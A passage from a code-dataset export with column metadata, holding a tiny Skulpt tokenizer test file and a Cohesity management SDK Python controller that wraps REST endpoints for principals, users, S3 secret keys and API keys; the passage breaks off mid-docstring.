hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
50585b9bd676ad66c6990e4ed93b9530d939d67c
30
py
Python
test/tokenize/t38.py
timmartin/skulpt
2e3a3fbbaccc12baa29094a717ceec491a8a6750
[ "MIT" ]
2,671
2015-01-03T08:23:25.000Z
2022-03-31T06:15:48.000Z
test/tokenize/t38.py
csev/skulpt
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
[ "MIT" ]
972
2015-01-05T08:11:00.000Z
2022-03-29T13:47:15.000Z
test/tokenize/t38.py
csev/skulpt
9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f
[ "MIT" ]
845
2015-01-03T19:53:36.000Z
2022-03-29T18:34:22.000Z
def k(x): x += 2 x += 5
7.5
10
0.3
7
30
1.285714
0.714286
0
0
0
0
0
0
0
0
0
0
0.125
0.466667
30
3
11
10
0.4375
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
aca10f29ea4ebab920b0665f8c0493432900c163
55,259
py
Python
cohesity_management_sdk/controllers/principals_controller.py
nick6655/management-sdk-python
88e792cb83e5c24a22af495b220c145d0c45841d
[ "Apache-2.0" ]
null
null
null
cohesity_management_sdk/controllers/principals_controller.py
nick6655/management-sdk-python
88e792cb83e5c24a22af495b220c145d0c45841d
[ "Apache-2.0" ]
null
null
null
cohesity_management_sdk/controllers/principals_controller.py
nick6655/management-sdk-python
88e792cb83e5c24a22af495b220c145d0c45841d
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2021 Cohesity Inc. import logging from cohesity_management_sdk.api_helper import APIHelper from cohesity_management_sdk.configuration import Configuration from cohesity_management_sdk.controllers.base_controller import BaseController from cohesity_management_sdk.http.auth.auth_manager import AuthManager from cohesity_management_sdk.models.api_key import ApiKey from cohesity_management_sdk.models.created_api_key import CreatedApiKey from cohesity_management_sdk.models.linux_support_user_bash_shell_access_result import LinuxSupportUserBashShellAccessResult from cohesity_management_sdk.models.linux_support_user_sudo_access_result import LinuxSupportUserSudoAccessResult from cohesity_management_sdk.models.sources_for_sid import SourcesForSid from cohesity_management_sdk.models.principal import Principal from cohesity_management_sdk.models.update_linux_password_result import UpdateLinuxPasswordResult from cohesity_management_sdk.models.user import User from cohesity_management_sdk.models.new_s_3_secret_access_key import NewS3SecretAccessKey from cohesity_management_sdk.exceptions.request_error_error_exception import RequestErrorErrorException class PrincipalsController(BaseController): """A Controller to access Endpoints in the cohesity_management_sdk API.""" def __init__(self, config=None, client=None, call_back=None): super(PrincipalsController, self).__init__(client, call_back) self.logger = logging.getLogger(__name__) self.config = config def list_sources_for_principals(self, sids=None): """Does a GET request to /public/principals/protectionSources. From the passed in list principals (specified by SIDs), return the list of Protection Sources objects and View names that each principal has permission to access. Args: sids (list of string, optional): Specifies a list of security identifiers (SIDs) that specify user or group principals. Returns: list of SourcesForSid: Response from the API. 
Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('list_sources_for_principals called.') # Prepare query URL self.logger.info( 'Preparing query URL for list_sources_for_principals.') _url_path = '/public/principals/protectionSources' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = {'sids': sids} _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for list_sources_for_principals.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for list_sources_for_principals.' ) _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='list_sources_for_principals') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for list_sources_for_principals.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, SourcesForSid.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_sources_for_principals(self, body): """Does a PUT request to /public/principals/protectionSources. Specify the security identifier (SID) of the principal to grant access permissions for. Args: body (UpdateSourcesForPrincipalsParams): Request to set access permissions to Protection Sources and Views for a principal. Returns: void: Response from the API. 
No Content Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_sources_for_principals called.') # Validate required parameters self.logger.info( 'Validating required parameters for update_sources_for_principals.' ) self.validate_parameters(body=body) # Prepare query URL self.logger.info( 'Preparing query URL for update_sources_for_principals.') _url_path = '/public/principals/protectionSources' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for update_sources_for_principals.') _headers = {'content-type': 'application/json; charset=utf-8'} # Prepare and execute request self.logger.info( 'Preparing and executing request for update_sources_for_principals.' ) _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request( _request, name='update_sources_for_principals') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for update_sources_for_principals.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) except Exception as e: self.logger.error(e, exc_info=True) raise def search_principals(self, domain=None, object_class=None, search=None, sids=None, include_computers=None): """Does a GET request to /public/principals/searchPrincipals. Optionally, limit the search results by specifying security identifiers (SIDs), an object class (user or group) or a substring. You can specify SIDs or a substring but not both. Args: domain (string, optional): Specifies the domain name of the principals to search. 
If specified the principals in that domain are searched. Domain could be an Active Directory domain joined by the Cluster or any one of the trusted domains of the Active Directory domain or the LOCAL domain. If not specified, all the domains are searched. object_class (ObjectClassSearchPrincipalsEnum, optional): Optionally filter by a principal object class such as 'kGroup' or 'kUser'. If 'kGroup' is specified, only group principals are returned. If 'kUser' is specified, only user principals are returned. If not specified, both group and user principals are returned. 'kUser' specifies a user object class. 'kGroup' specifies a group object class. 'kComputer' specifies a computer object class. 'kWellKnownPrincipal' specifies a well known principal. search (string, optional): Optionally filter by matching a substring. Only principals in the with a name or sAMAccountName that matches part or all of the specified substring are returned. If specified, a 'sids' parameter should not be specified. sids (list of string, optional): Optionally filter by a list of security identifiers (SIDs) found in the specified domain. Only principals matching the specified SIDs are returned. If specified, a 'search' parameter should not be specified. include_computers (bool, optional): Specifies if Computer/GMSA accounts need to be included in this search. Returns: list of Principal: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('search_principals called.') # Prepare query URL self.logger.info('Preparing query URL for search_principals.') _url_path = '/public/principals/searchPrincipals' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = { 'domain': domain, 'objectClass': object_class, 'search': search, 'sids': sids, 'includeComputers': include_computers } _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for search_principals.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for search_principals.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='search_principals') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for search_principals.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Principal.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_session_user(self): """Does a GET request to /public/sessionUser. Get the information of the logged in user. Returns: User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('get_session_user called.') # Prepare query URL self.logger.info('Preparing query URL for get_session_user.') _url_path = '/public/sessionUser' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_session_user.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_session_user.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_session_user') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_session_user.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def delete_users(self, body=None): """Does a DELETE request to /public/users. Only users from the same domain can be deleted by a single request. If the Cohesity user was created for an Active Directory user, the referenced principal user on the Active Directory domain is NOT deleted. Only the user on the Cohesity Cluster is deleted. Returns Success if the specified users are deleted. Args: body (UserDeleteParameters, optional): Request to delete one or more users on the Cohesity Cluster. Returns: void: Response from the API. No Content Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('delete_users called.') # Prepare query URL self.logger.info('Preparing query URL for delete_users.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for delete_users.') _headers = {'content-type': 'application/json; charset=utf-8'} # Prepare and execute request self.logger.info( 'Preparing and executing request for delete_users.') _request = self.http_client.delete( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='delete_users') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for delete_users.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) except Exception as e: self.logger.error(e, exc_info=True) raise def get_users(self, tenant_ids=None, all_under_hierarchy=None, usernames=None, email_addresses=None, domain=None, partial_match=None): """Does a GET request to /public/users. If no parameters are specified, all users currently on the Cohesity Cluster are returned. Specifying parameters filters the results that are returned. Args: tenant_ids (list of string, optional): TenantIds contains ids of the tenants for which objects are to be returned. all_under_hierarchy (bool, optional): AllUnderHierarchy specifies if objects of all the tenants under the hierarchy of the logged in user's organization should be returned. usernames (list of string, optional): Optionally specify a list of usernames to filter by. All users containing username will be returned. email_addresses (list of string, optional): Optionally specify a list of email addresses to filter by. domain (string, optional): Optionally specify a domain to filter by. 
If no domain is specified, all users on the Cohesity Cluster are searched. If a domain is specified, only users on the Cohesity Cluster associated with that domain are searched. partial_match (bool, optional): Optionally specify whether to enable partial match. If set, all users with name containing Usernames will be returned. If set to false, only users with exact the same name as Usernames will be returned. By default this parameter is set to true. Returns: list of User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_users called.') # Prepare query URL self.logger.info('Preparing query URL for get_users.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = { 'tenantIds': tenant_ids, 'allUnderHierarchy': all_under_hierarchy, 'usernames': usernames, 'emailAddresses': email_addresses, 'domain': domain, 'partialMatch': partial_match } _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_users.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info('Preparing and executing request for get_users.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_users') # Endpoint and global error handling using HTTP status codes. 
self.logger.info('Validating response for get_users.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def create_user(self, body=None): """Does a POST request to /public/users. If an Active Directory domain is specified, a new user is added to the Cohesity Cluster for the specified Active Directory user principal. If the LOCAL domain is specified, a new user is created directly in the default LOCAL domain on the Cohesity Cluster. Returns the created or added user. Args: body (UserParameters, optional): Request to add or create a new user. Returns: User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('create_user called.') # Prepare query URL self.logger.info('Preparing query URL for create_user.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for create_user.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for create_user.') _request = self.http_client.post( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='create_user') # Endpoint and global error handling using HTTP status codes. 
self.logger.info('Validating response for create_user.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_user(self, body=None): """Does a PUT request to /public/users. Returns the user that was updated on the Cohesity Cluster. Args: body (User, optional): Request to update an existing user. Returns: User: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_user called.') # Prepare query URL self.logger.info('Preparing query URL for update_user.') _url_path = '/public/users' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for update_user.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for update_user.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='update_user') # Endpoint and global error handling using HTTP status codes. 
self.logger.info('Validating response for update_user.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, User.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_user_privileges(self): """Does a GET request to /public/users/privileges. List the privileges of the session user. Returns: list of string: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_user_privileges called.') # Prepare query URL self.logger.info('Preparing query URL for get_user_privileges.') _url_path = '/public/users/privileges' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_user_privileges.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_user_privileges.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_user_privileges') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_user_privileges.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body) except Exception as e: self.logger.error(e, exc_info=True) raise def create_reset_s_3_secret_key(self, body=None): """Does a POST request to /public/users/s3SecretKey. Returns the new key that was generated. 
Args: body (ResetS3SecretKeyParameters, optional): Request to reset the S3 secret access key for the specified Cohesity user. Returns: NewS3SecretAccessKey: Response from the API. New S3 Secret Access Key. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('create_reset_s_3_secret_key called.') # Prepare query URL self.logger.info( 'Preparing query URL for create_reset_s_3_secret_key.') _url_path = '/public/users/s3SecretKey' _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for create_reset_s_3_secret_key.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for create_reset_s_3_secret_key.' ) _request = self.http_client.post( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='create_reset_s_3_secret_key') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for create_reset_s_3_secret_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize( _context.response.raw_body, NewS3SecretAccessKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_user_api_keys(self, sid, ids=None): """Does a GET request to /public/users/{sid}/apiKeys. Fetch API keys for user. Args: sid (string): Specifies the user sid. ids (list of string, optional): Specifies a list of API key ids. Returns: list of ApiKey: Response from the API. 
Get lock file status response Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_user_api_keys called.') # Validate required parameters self.logger.info( 'Validating required parameters for get_user_api_keys.' ) self.validate_parameters(sid=sid) # Prepare query URL self.logger.info( 'Preparing query URL for get_user_api_keys.') _url_path = '/public/users/{sid}/apiKeys' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid': sid}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_parameters = {'ids': ids} _query_builder = APIHelper.append_url_with_query_parameters( _query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for get_user_api_keys.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_user_api_keys.' ) _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_user_api_keys') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for get_user_api_keys.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, ApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def create_user_api_key(self, sid, body): """Does a POST request to /public/users/{sid}/apiKeys. Create an API key for user. Args: sid (string): Specifies the user sid. body (CreateApiKeyParams): Request to create an API key. 
Returns: CreatedApiKey: Response from the API. Get lock file status response Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('create_user_api_key called.') # Validate required parameters self.logger.info( 'Validating required parameters for create_user_api_key.') self.validate_parameters(sid=sid, body=body) # Prepare query URL self.logger.info('Preparing query URL for create_user_api_key.') _url_path = '/public/users/{sid}/apiKeys' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid': sid}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for create_user_api_key.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for create_user_api_key.') _request = self.http_client.post( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='create_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for create_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, CreatedApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_user_api_key_by_id(self, id, sid): """Does a GET request to /public/users/{sid}/apiKeys/{id}. Fetch an API key for user by its id. Args: id (string): Specifies the API key id. sid (string): Specifies the user sid. 
Returns: ApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('get_user_api_key_by_id called.') # Validate required parameters self.logger.info( 'Validating required parameters for get_user_api_key_by_id.') self.validate_parameters(id=id, sid=sid) # Prepare query URL self.logger.info('Preparing query URL for get_user_api_key_by_id.') _url_path = '/public/users/{sid}/apiKeys/{id}' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid':sid, 'id': id}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for get_user_api_key_by_id.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for get_user_api_key_by_id.') _request = self.http_client.get(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='get_user_api_key_by_id') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for get_user_api_key_by_id.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, ApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def update_user_api_key(self, sid, id, body): """Does a PUT request to /public/users/{sid}/apiKeys/{id}. Update an API key. Args: sid (string): Specifies the user sid. id (string): Specifies the API key id. body (UpdateApiKeyParams): Request to update an API key. Returns: CreatedApiKey: Response from the API. 
Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('update_user_api_key called.') # Validate required parameters self.logger.info( 'Validating required parameters for update_user_api_key.') self.validate_parameters(sid=sid, id=id, body=body) # Prepare query URL self.logger.info('Preparing query URL for update_user_api_key.') _url_path = '/public/users/{sid}/apiKeys/{id}' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid':sid, 'id': id}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info('Preparing headers for update_user_api_key.') _headers = { 'accept': 'application/json', 'content-type': 'application/json; charset=utf-8' } # Prepare and execute request self.logger.info( 'Preparing and executing request for update_user_api_key.') _request = self.http_client.put( _query_url, headers=_headers, parameters=APIHelper.json_serialize(body)) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='update_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for update_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, CreatedApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def delete_user_api_key(self, sid, id): """Does a DELETE request to /public/users/{sid}/apiKeys/{id}. Delete an API key for user. Args: sid (string): Specifies the user sid. id (string): Specifies the API key id. Returns: void: Response from the API. 
No Content Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ try: self.logger.info('delete_user_api_key called.') # Validate required parameters self.logger.info('Validating required parameters for delete_user_api_key.') self.validate_parameters(sid=sid, id=id) # Prepare query URL self.logger.info('Preparing query URL for delete_user_api_key.') _url_path = '/public/users/{sid}/apiKeys/{id}' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'id': id, 'sid':sid}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare and execute request self.logger.info( 'Preparing and executing request for delete_user_api_key.') _request = self.http_client.delete(_query_url) AuthManager.apply(_request, self.config) _context = self.execute_request(_request, name='delete_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info('Validating response for delete_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) except Exception as e: self.logger.error(e, exc_info=True) raise def rotate_user_api_key(self, id, sid): """Does a POST request to /public/users/{sid}/apiKeys/{id}/rotate. Fetch an API key for user by its id. Args: sid (string): Specifies the user sid. id (string) Specifies the API key id. Returns: CreatedApiKey: Response from the API. Success Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" try: self.logger.info('rotate_user_api_key called.') # Validate required parameters self.logger.info( 'Validating required parameters for rotate_user_api_key.' ) self.validate_parameters(sid=sid, id=id) # Prepare query URL self.logger.info( 'Preparing query URL for rotate_user_api_key.') _url_path = '/public/users/{sid}/apiKeys/{id}/rotate' _url_path = APIHelper.append_url_with_template_parameters( _url_path, {'sid':sid, 'id': id}) _query_builder = self.config.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers self.logger.info( 'Preparing headers for rotate_user_api_key.') _headers = {'accept': 'application/json'} # Prepare and execute request self.logger.info( 'Preparing and executing request for rotate_user_api_key.' ) _request = self.http_client.post(_query_url, headers=_headers) AuthManager.apply(_request, self.config) _context = self.execute_request( _request, name='rotate_user_api_key') # Endpoint and global error handling using HTTP status codes. self.logger.info( 'Validating response for rotate_user_api_key.') if _context.response.status_code == 0: raise RequestErrorErrorException('Error', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize( _context.response.raw_body, CreatedApiKey.from_dictionary) except Exception as e: self.logger.error(e, exc_info=True) raise def get_all_user_api_keys(self, user_sids=None): """Does a GET request to 